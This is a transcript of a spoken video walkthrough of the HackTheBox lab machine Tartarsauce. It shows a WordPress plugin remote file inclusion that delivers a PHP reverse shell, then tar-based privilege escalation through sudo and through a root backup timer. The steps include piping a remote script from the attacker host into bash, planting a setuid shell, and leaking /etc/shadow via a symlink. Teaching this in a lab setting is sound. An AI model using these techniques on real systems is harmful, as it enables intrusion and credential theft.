What's going on YouTube? This is Ipsec. I'm doing Tartarsauce from HackTheBox. This box was created by Emergence, and I haven't really done any prep work for this video, so we're going to see how it goes. It may be a little bit more over the place than we're used to. My favorite thing about this box was simply its name, Tartarsauce. And the name comes from using tar to escalate from an Apache user to a low privilege user, and that low privilege user to root. You have to exploit tar twice, hence the name Tartarsauce, and I found that funny. The very first exploit to get as the Apache user is unrelated. You exploit a WordPress plugin, get the Apache user, and then you'll see the Apache user can execute tar as a low privilege sudo, user via sudo. And if you didn't know how to execute commands as tar, you can just do a search for GTFOBins, get the frick out bins, and find that path. Then once you get on the box, there is a service that runs every 5 minutes that uses tar in a bad way that you can use to drop a SetUID binary on it or exfil files owned by root and privesc that way. So let's just jump in. As always, we start off with an nmap, so -sc for default scripts, sv enumerate versions, 08 output all formats, put in the nmap directory and call it Tartarsauce, then the IP address of the box, which is 10.10.10.88. Can take some time to run, so I've already ran it. Looking at the results, we see just one port is open, that is port 80. Of course, it is HTTP, and the server banner is saying it's Apache HTTPD 2418 Ubuntu. If we Googled around for this version with Ubuntu, we probably come across launchpad.net, and launchpad.net would say this version of HTTPD is packaged with Ubuntu Xenial. We also have the nmap script http-robots.txt go off. It discovered a robots.txt file with 5 disallowed entries. So if we went over to the web server and went to robots.txt, we would see the actual disallowed entries. So let's try each one of these. So the first one is web services Tartarsauce. So 10.10.10.88 web services Tartarsauce. That is not found. Going to the next one, Monstra 3014. Let's try this. We do get a blog, but let's go and find all of them. So file uploader 10.10.10.88. This is going to be a 404 as well. We have developmental, and all of these are in the web services directory. And then the final one is phpMyAdmin. So we do have Monstra, which is looks like a CMS. It says version 304 in the URL, and down here it also says 304. But I'm not going to poke at this just yet because I always like doing some type of recon in the background because recon takes a while to perform and you never want to wait on it. So it's always smart to do that in the background while you're manually poking at something because it may take 30 minutes to run, and if you run it, you won't get the results for 30 minutes. So if it takes 30 seconds to set it up as soon as possible. So we'll do gobuster-u for URL, http 10.10.10.88, and a lot of stuff was in that web services directory, so I'm going to start there. And the word list I'm going to do is the same one as always, so we'll do user share word list dirbuster directory list 23 medium -o for out file. I think it was a -w gobuster-h grep -o is out. So let's go up so I can copy that. Copy this. And do -o. We'll do gobuster-web services.out. So we have started that up, and immediately it discovers a /wp directory, so I'm going to check that one out. So 10.10.10.88/wp. We have to do web services/wp. And we see powered by WordPress, and nothing's really working. And WordPress puts a lot of absolute URLs in, which means whenever they link a image or JavaScript, it puts the whole domain name in that URL instead of just starting with the WordPress directory. I'm going to view the source to see what the absolute URL is. And we see it's http://10.10.10.88. There is a mistake here. You need 2 slashes before that. So I'm going to go turn burp suite on. So for all URLs, go into burp, Going to go into my Options tab, scroll down to Match and Replace. I'm going to replace the response body. I'm going to match for HTTP:/10, replace it with HTTP://10. And then we're going to also add one to do the response header. So HTTP:/10, replace with HTTP://10. Okay. We have both of those replaced. If we go and refresh the website, we do have a working website. So we can probably do, I think it's wp-login.php to verify this is indeed WordPress. So as I said, we want recon going in the background. So before I go back to Monstra, I'm going to do WPScan -h for help. We want --URL. Let's see, what else is there? I normally like doing enumerate all plugins. So -e space AP. And by default, I think it only does vulnerable plugins, but I like doing all known plugins because just because it doesn't have a known vulnerability for it doesn't mean it's secure. It may just mean someone hasn't looked at it yet. So knowing all the plugins is good because if there's not a vulnerability, may want to go look for one. Let's see, is there an out? --log is how we do out files. So WPScan --URL, HTTP 10.10.88, web services /WP. We want -e for enumerate, AP, all plugins, --log, WPScan.out. I think that should be good. Let this run. We hit the web server, it detected that, it's enumerating the version, and as soon as it does this, I will go back and we'll poke at Monstra and just let this go in the background. So I'm going to rename this window to WPScan, and there we go. We have definitely hit WordPress. So it's going to take a while to scan all those plugins. Let's go over and look at Monstra. So we just have the, looks like, default welcome page. Let's go to blog, users, login, and registration. And all of those hit not found. So I am next going to check links. Let's try this one, /admin and admin page manager. Looks like both of these links do resolve. Firefox is going a bit slow. Can't tell if that's Firefox or Monstra. There we go. So we do have the copyright from 2016, so chances are this hasn't been updated in a while. We can try logging in with like admin, that's normally a default credential, and we get in right away. The very first thing I do normally when I get into a CMS is try to edit the themes, because themes are generally going to be PHP, and if we can edit PHP code, we can just get code execution right away. So we can do hello world right here. Click save, and we get an error message. So generally, if we can't edit templates, they are read-only. That is a good thing to do on web servers because you don't want your admins getting code execution on your server. You may think they're admin anyways, so why not? Well, if you run on like a shared platform or in the cloud, you may be able to get to other client data. They can get to the database easier. All sorts of bad things can happen. So even if it's an admin, still try to stop them from getting shells. I'm going to try a backup, and we'll see if the backup directory is writable. We see backup not created, so it's looking like this entire Monstra instance is read-only. We can go to content files, try to create a new directory. We'll create the directory, please subscribe. Says the directory was created, but doesn't look like it going to this page. We should see probably the directory, I'm guessing where uploads is. We can select file and go to root, HTTP, boxes, Tartarsauce, and we can create a new one, touch test echo. Please subscribe to test and try to upload this. File was not uploaded, so could be a bad extension or just still being in read only. we go to system info, debugging is turned off. It doesn't look like there's a way to edit this. Right now I'm just trying to see if we can change the config file at all. So Monstra says stuff can be writable. Let's see, settings, maintenance mode. Let's try PHP info. Try this. Okay. That's weird. Did it just not like PHP? We'll do this here. Please subscribe to this message. And maintenance mode may just be a text file, and we're failing to write to that text file. And that's what I'm guessing, because nothing gets accepted. So let's go back to WPScan to see if that has finished. We only got about 10 seconds left, so we'll let this enumeration finish and see if it found anything with WordPress. We could also go and do search exploit on Monstra, see if there's anything there. 304, file upload code execution. We can't upload files. Folder deletion, cross-site scripting, we're already admin, so that's not really relevant. Could also do like GitHub Monstra. And if we go to the GitHub page, we can look at issues. And we see stored cross-site scripting, directory traversal, file deletion, PHP code execution. What is this one? Visit Google Analytics. I don't see where he's actually editing the code. Snippets. I'm guessing we need write access there. Going through GitHub tickets is sometimes very painful. Found a few bugs. Just asking how to report. Remote code execution vulnerability. We have this guy saying he found one. Then looks like the same day, or maybe this was created before then. Nope, same day, reports it as a CVE and puts the instructions. Looks like he's uploading a plugin that is a shell. So that's nothing. Again, requires upload. What I'm looking for is like a SQL injection or LFI, RFI, something to get code execution without placing a file. And I don't really see anything there. We could also go through the closed and look at that, because maybe they updated the version and the changelog's here. But WPScan should be finished running, so we'll just go over that. And we see there is a guest book with a cross-site scripting. And again, cross-site scripting, probably don't want to do that just because it's normally not a vector in CTFs. We can do search exploit on Gwolle. And we see that this guest book has a remote file inclusion. So I'm going to take a look at it. So search exploit -x in the path to read it. Let's see, advisory ID. Looks like we have WP content plugins, front-end CAPTCHA, and then it allows for a RFI. So RFI is a remote file include. It's like a LFI, but remote. So it's going to go to this URL and potentially execute code. Let's try this. So go to Tartarsauce. We want to go to Web Services WP, and then /WP content plugins. And for this absolute path, we want to put RIP. So we're 10.10.14. Let's see, what are we? ifconfig ton 0. We are 14.14. And we'll do / please subscribe. And RFIbox would listen on port 80. Run this, go back, and we see the web server 10.10.10.88 has initiated connection and try to get the file please subscribe wp-load.php. So we know the RFI is appending wp-load.php and may be executing this code. So let us make a directory, www, and we want to locate php-reverse. We're going to put a PHP reverse shell here. This is the one I like using, user share, laudanum, PHP, whatever. So copy this. We'll name this rev.php, I guess. Just give it a short name so we don't have to type it. Go through all these comments and change the IP address. So we want 10.10.14.14 and ports number. I like doing 9001. Probably should do 443 just for firewall evasion. Generally works on that port, but I don't think we have to worry about that. Python M simple HTTP server on port 80. And it should be noted, when hosting PHP scripts for RFI vulnerabilities, I love using the Python web server and not like Apache because I can't count the number of times I had an RFI reach out to my PHP shell on Apache, and Apache had the PHP module installed, so Apache would execute it on my box and give me a shell to myself, and I'd just be confused. So doing the Python-M simple HTTP server won't execute PHP code, so we don't have to worry about that. We should also listen on port 9001. And when we don't want to call it rev. We called the file just rev.php. We actually want to call that wp-load.php. So let's fix that, because that's what the web server is going to be getting. So just make that RFI go to 10.10.14.14. The web server is going to append wp-load.php, and if it's going to execute, we'll get a shell. And we got a shell as www-data, and the uname is saying it's Linux Tartarsauce, so we know we're on the box. So python-c import pty.spawn bin bash, and then we'll do stty raw -echo, and this gives us the ability to do tab autocomplete, control C's and stuff, and then type fg enter to get back in. So the very first thing I want to do is go to var www HTML, web services. Let's go into Monstra, find dot dash, I think writable is normally a flag. Oh, that's ugly. Before I do that, let's do stty-a. We are 38 rows and 146 columns. So let's go back to our shell and do stty rows 38 columns. Did I say 138? And now our shell is a bit better. We can't clear. I did Control L, it doesn't do that. Typing clear says term environment variable not set. So I'm going to do export term is equal to xterm dash color. And there we go. So our environment's properly set. Now we can do find dot dash writable. And we see only two files are writable. We have sitemap.xml and pages1.page.txt. So potentially we may have a code execution path if we edited this page, but I'm not positive. Maybe worth checking if you want to play around with this box, but let's go back into a home directory, which is just var www, and I'm going to host another file on a web server. I'm going to copy opt LinEnum and LinEnum.sh over here, and then we'll just execute this. So we'll do curl 10.10.14.14 / linenum.sh, pipe it to bash. And if you don't have this, just go to like github linenum.sh, and this is the one it is. So off reboot uses the one I have running right now. So let's go up top, linenum. And we don't have thorough test running, so SetUID and GUID binaries will not be checked. We could edit the script or pass the argument if we wanted to check that. So let's see. The kernel is from 2018, so relatively recent, probably right around the time the box compiled. Host name's Tartarsauce with www-data. We have two users who have logged into the system, root and Onuma. Group memberships. looks like the syslog user may be an admin. I think that's what that's saying. Onuma root. We can sudo without supplying a password, so this did sudo-l, and we see we can execute the bin-tar file. So if we do sudo-l to confirm this, we do see that yes, we can execute tar with no password as the Onuma user. So the first thing I do when I do that is I Google GTFOBins GitHub, and GTFOBins stand for Get the Frick Out Bins, and they are wonderful. So let's go over to GTFOBins. It's very much like lolbins, if you're familiar with Windows, they're living off the land binaries, but right now there's 112 binaries. We're going to type tar, and we can see all the functions for this. So the binary tar, like interesting things, shell, command, file write, file read. So if we look at shell, we can see tar cf dev null checkpoint action exec bin sh will execute that. We see it has a way to write files with tar, read files with tar. So we could potentially write a SSH key to Onuma's directory, but it won't work because, well, it may work, but we can't really abuse it because SSH wasn't listening. But there is a sudo one, so sudo tar. Let's just copy this, paste this in, and it's asking for the password because we have to specify the -u flag, so -u ONUMA, and hit enter, and we get a shell. So ID, we're now Onuma. I'm just going to change that to be bin bash instead of sh to make it a bit more pretty. And we have escalated to Onuma. So let's go in this home directory, see what's there. We have a MySQL history file, creates a database called Backuperer. Not really that interesting. Shadow backup to dev null. Not sure what that is. So nothing too interesting there. Let's do that curl command again. So curl 10.10.14.14 LinEnum.sh, pipe it over to bash, and run this again. This can take a few seconds to run. It should have enough good info. So we made it to pass WD last time, so let's keep going down. So home directories, nothing really there. Environment variables, cron jobs, not really looking like there's anything that isn't standard. Cron type contents, again, that's just running all the cron hourly, daily, weekly stuff. System D timers, we see Backuperer.timer, and this is definitely not a normal service. We see it's got 3 minutes and 2 seconds left, and it passed 1 minute 57 seconds ago, so it looks like this is running every 5 minutes. System D timers are just a new way to kind of do cron jobs from services, so we can probably do a locate command on Backuperer and get what the System D stuff is. So locate Backuperer, and let's look at these files. So looking at the Backuperer.timer, we see the description, runs it every 5 minutes, on boot, 5 minutes, Backuperer.service, wanted by multi-user.target, which is the default run level. So let's check the next thing out. The actual service for System D, and nothing there. We got a user sbin Backuperer, so let's look at what this is. Says it may be a binary file. Let's do yes to view anyways. And we get a, looks like a bash script. Bin bash is at the top. So let's vim user sbin Backuperer, and we'll change the color to elf lord because that may be easier to read. So let's see. Let us, whoops. Oh, we got a lot of panes open. Let's send this pane away to 3. Go here, send this pane away to 3. And then, oh, come on. Just getting a pane on the right so I can do notes, So let's see, color elf-lord again. And oh, Vim did not like me changing this. That is ugly. So let's quit that. Just cat this file, sbin, Backuperer, and we're going to copy this and do this locally. Go to new pane. Okay, notes.sh, edit anyway, vim backuperer.sh, paste this in, have to do set paste, type it, set paste, there we go, paste that, color, elf-lord. So, setting a bunch of variables. Those look important, so I'll put those in my notes. Copy this. Go over here and paste. So we have baster is var www.html, backup directory is var backups, temp directory is var temp. We got a test message and an error message, and these are going to paths to the backup directory, and Onuma backup test and backup error. It's creating a temp file, and that temp file is just creating a random SHA-1 sum. We see it heading a bunch of stuff out of urandom, piping to SHA-1 sum, and grabbing, looks like the first field, which will be the hash. So I'm just going to rename this in here to be RND. And then check is temp directory / check. So let's see what check is. Search the code for check, going down. At the very beginning, we're deleting check. Check is used in this integrity check function that it creates, doing user bin diff on baster and check baster. So let's do comment here. Base directory is going to be var www.html, and check baster is, let's see, check is temp directory, so var temp, check, and then baster. And I think that would look better if we put that on the bottom line. There we go. Okay. So we're going to make the directory check. And it looks like ZXVF, we're extracting something into check. So Z is gzip, X is extract, V is verbose, F is file. -C means change to this directory before running tar. So check is getting stuff extracted. And then after it extracts, it runs integrity check to do a diff against it. So kind of have an idea what the script is doing. Let us put notes. So we know the script runs every 5 minutes. I don't like that color. Color elf-lord. There we go. And the very first thing the script does is, well, print messages that we don't care about, but it does a delete on temp directory. So deletes temp stuff, and that stuff was created by this script. The next thing it does is a tar as the Onuma user, ZCVF, so gzip create verbose file, and it's going to tar up temp file. Temp file is the file name, and it's going to do base directory. So var www.html to random stuff. The next thing we do is, oh, that's interesting. It does this ampersand. So it's not going to wait for this command to finish. This is backgrounded. So it immediately, as soon as it starts turning things up, it goes to the next thing, which is sleep for 30 seconds. Then this is defining a function. I wish that was up top. It would just make it more easy to read. It's not doing that immediately. We're going to make the directory check and then extract temp file, which is the tar we had just created. So after 30 seconds, extract what we created and integrity check. So the integrity check is diff ving var www HTML and var temp www HTML, or var temp check HTML. I have them in comments. Keep going down. So if success, then exit 2. And 2 is an error. So if the diff runs, exit 2, I guess. Then we got an else. And we are going to, looks like, clean up and save the archive. So delete files and exit 0 is what it looks like it's doing. So if we can go down this success path, we can have tar extract all the files and then not delete them up until the next time the script is ran, which is with probably 4 minutes and 30 seconds. Because right here is the script running. Then we create a tar, sleep for 30 seconds, extract the tar we created, and then if it's successful, it exits, doesn't clean up what we created until the next time it runs, which is the next 5-minute interval. If it isn't successful, it deletes files. So what we have to do is figure out how to make this if-then fail. So let's do, what is it? If, then we can do diff dash r var www HTML, and we'll do var www, or we'll do srv. Then echo success, else, do I do that? I think I just do else like this, echo fail fee, and diff var www HTML no such file or directory, var www HTML. That's weird. There is a directory there. Oh, I have 4 W's. So we did that, and we hit the fail loop. So if a directory is not valid, it goes to fail, which then means it deleted files. And if it is successful, if all the directories exist, it will go into the success. So what we have to do is create a archive that has var www HTML. So when it extracts, it adds those directories and the diff command is valid. So if we go back to our shell, we can name this shell. We can go to var temp, then we can do make dir var www HTML. We want to do -p so it creates all those directories. And what I mean is, if we just created a file, so we'll create please subscribe, and then enter CVF. I think they did Z for gzip, but test, and we do please subscribe. When it extracts this, test is actually a gzip. Let's rerun that command. test.tar.gz. So if we remove please subscribe tarzxvf test.tar.gz, it's just going to place the please subscribe file here. And then when the command runs, it's going to do a diff-r var temp var www.html, and then var temp var www.html. There's a check directory here. I just didn't feel like creating it. And that command's going to fail because, let's erase that. That diff command's going to fail because there's no such file or directory. However, if we had put these directories in a tar, they will be existing. Hopefully that makes sense. For temp HTML. So rm please subscribe. And not var temp. Var make directory -p var www HTML. So what we want to do is create a SetUID file, because tar keeps the file permissions. So when it extracts this, we want it to have a SetUID for a SetUID file so we can just execute and get root. So let's check if we have GCC. We do not. Locate -r GCC just to see if it's not on our path. And user libgcc, and we doesn't look like we have the binary. So let's go over to our CaliBox and uname-a. It is 32-bit. So let's copy op setuid op shells setuid.c. And I think I created this in the jail video. Just a simple setuid file. We're gonna set real user ID 00, that is root's user and root's group, and then execute bin.sh. So I think bash actually drops setuid, so I don't know if it would work if it's bash. May work. So we'll do gcc-m32 for 32-bit, -o for out file. We'll call this please subscribe, and then the file name, which was setuid.c. And if this doesn't work on your Kali, it's, I think, app search gcc-multilib. Is this a package? Yep. So just do apt install gcc-multilib, and it will install things so you can compile to what you need. So we need to send this file over to the box. So I'll just do netcat lvnp to listen and direct that file into netcat. And we have to do a port 9002. So it's listening on port 9002. Whoever connects to it gets the file. So netcat 10.10.14.14 9002, and we'll direct it to please subscribe. And we see the file there. We can do file on it. See, it's a 32-bit elf. We can chmod 65555. The first 6 is SetUID and SetGID, then read execute for owner, group, and everyone. So do that to please subscribe. / please subscribe executes, but since it's not owned by root, the SetUID doesn't work. So we can go up. We have to create the tar file. So remove test. We'll create, let's see, tar zcvf. We'll create please subscribe.tar.gz, tar up var. So now we just have to do systemctl, I think list timers, and we can see how much time is left. We see 1 minute and 16 seconds. I can do watch-n1, which is going to run a command every second. Systemctl list timers. And now we see, man, it really doesn't like this window being open. Let's exit this pane, do that again. And we see it's running that command every single second and updating this. So in 40 seconds, the script's going to kick off it's going to tar up var HTML. I'm going to replace what it tars up with what I tarred up. So when it extracts it as root, and hopefully I can just set UID. So hopefully that makes sense. Maybe it'll make sense in 20 seconds when this kicks off. There's 5 seconds left. If you're wondering if that was a fast 20 seconds, yeah, I edited the video to save you waiting 10 seconds. We do ls-la. We see it created that random junk. So I'm going to copy please subscribe.tar.gz into that random junk file. And we can remove this var. We don't need it anymore. And now we're just waiting for it to hit the 30-second mark because now it's in the sleep 30 to create the check directory and extract everything into check. So we got another 2 seconds left. So we should see it created check as root. So if we go in the directory, do ls-la, we see our file there, but it's still owned by Onuma. So it looks like we forgot to do something, and that is change the owner to root. And you'll see we can't do that because, well, we just don't have permission to change owners as root, because that would be bad if we could just change any file as root. Fortunately for us, that tar embeds the user ID that owns the file in the actual archive. So what we can do is go back to our box, create var HTML, place the please subscribe binary in there, and then tar it up here because, var HTML, do chmod 6555, because now in the tar archive, it is owned by root, has the set UID, and is executable by anyone. So we can do tar zxcvf, not zx, zcvf, to gzip create verbose file. So we want to create, we'll call this setuid.tar.gz, and specify the directory, which is var, archives up everything. We can do that netcat lvnp 9002 direct setuid. Go back to our shell, go to var temp, and see, well, one more directory, netcat 10 14 14 9002, and we'll call this what, setuid.tar.gz. Go back to our watch command and see that we have 2 minutes and 25 seconds left until we can get the code execution. So I'm going to pause the video and we'll resume when it has 5 seconds left. So we got 5 seconds left. The script should run. Do a ls-la. It looks like that's the same hash as last time. There we go. It changed. So I'm going to copy setuid over top of 16f, that new RAM directory it created. And we see they're the same file size. We can get rid of this please subscribe tar.gz so it doesn't confuse us. And now we're just waiting for it to extract the file and see if it extracted it as root and left our permission intact. So we got 3 seconds left. Do a ls-la. There is that check directory. So we got 4 minutes and 30 seconds left of this. Looking at var HTML. We see the files there. It's owned by root because the tar archive said it was, and the server obeyed it. It's very much like the NFS stuff, if you remember back from, again, the jail video. So we can do ID. We just see we are root, ls-la, wc-c on root.txt. We can see we can read the file. It's 33 characters long, which is an MD5 sum and a line break. And that is the box. We can look at the MySQL history here. And this is probably setting up WordPress or Monstra. Not sure what this is doing. Where option site URL. So this is updating WordPress option, set option value equal to, and he screwed up right here. So it looks like when he was manually creating the WordPress database, he forgot to do the double slashes. So my guess is he was hand jamming this in and decided to leave it because he enjoyed WordPress not working exactly as you'd expect. There is another thing we can do to this binary. So we can show this real quick, and it's actually pretty cool. So var var temp. So we could have just done make dir-p var html, and if we look at var, was it backup? Let's get out of root. Exit. So if we look at, I think it was var backup, Onuma backup test is what outputted the information to. Backuperer shows the output of the diff. So this is the integrity check, and we can see our file there. And if files were different, it actually outputs here. So if we do make dir rm-rf SetUID.tar, we don't need that anymore. Make dir-p var html, and let's see, I think index.html was in this one, var html. So yeah, we can just replace any file with a symlink to a file we can't read, and then when root extracts it, it's going to do a diff and let us read it. So let's see, ln-s to create a symbolic link. We want one on shadow, and we'll name this index.html. So we have in var html, we have a shortcut to from index.html to Etsy shadow. Of course, we can't read that because the symlink takes the permissions of what you're linking to, but root can read that, and root's running this. So let's tar this up. So tar z cvf on, we'll call this symlink.tar.gz, and let's do the watch. We have about 15 seconds left for, we got 40 seconds left until it starts. So again, what this is doing is when it extracts it, it's doing a diff on everything. It's going to diff var html index.html and the one we had created, which points to Etsy shadow, and write the differences to that Backuperer text file, which will show shadow. It's kind of a gimmick on this box, but I have seen cases where you can actually do this. It backs up things and sends it to a remote server and actually sends the full file and not the symlink. So we got 5 seconds left, and we should get a new file name. So instead of 16, that is 17. So copy a symlink over top of this, and we just got to wait for the 30-second mark to hit, so it untars this and then does a diff. So about 10 more seconds, and we should see a file get updated. So let's see, we can probably just tail-f this file, and there we go. We have the shadow. Because again, it diffed index.html. Oh my god. That is a lot of line breaks. Is that what the file actually looks like? HTML index. Did I not go? Why did I not see this? 10, 10, 10, 88. Oh, I never actually viewed this page. We just saw web services and homed in on it. We get a giant thing of Tartarsauce. If we open the view source, he put a bunch of line breaks and saw the carry on. We just didn't do that because we homed in on web services after seeing the robots.txt file. But in that Backuperer log, we do have the Etsy shadow output. You could have done root.txt and got it that way, but getting it through a shell is much more cooler than just getting a file read. Hope you guys enjoyed that box. Take care, and I will see you all next week.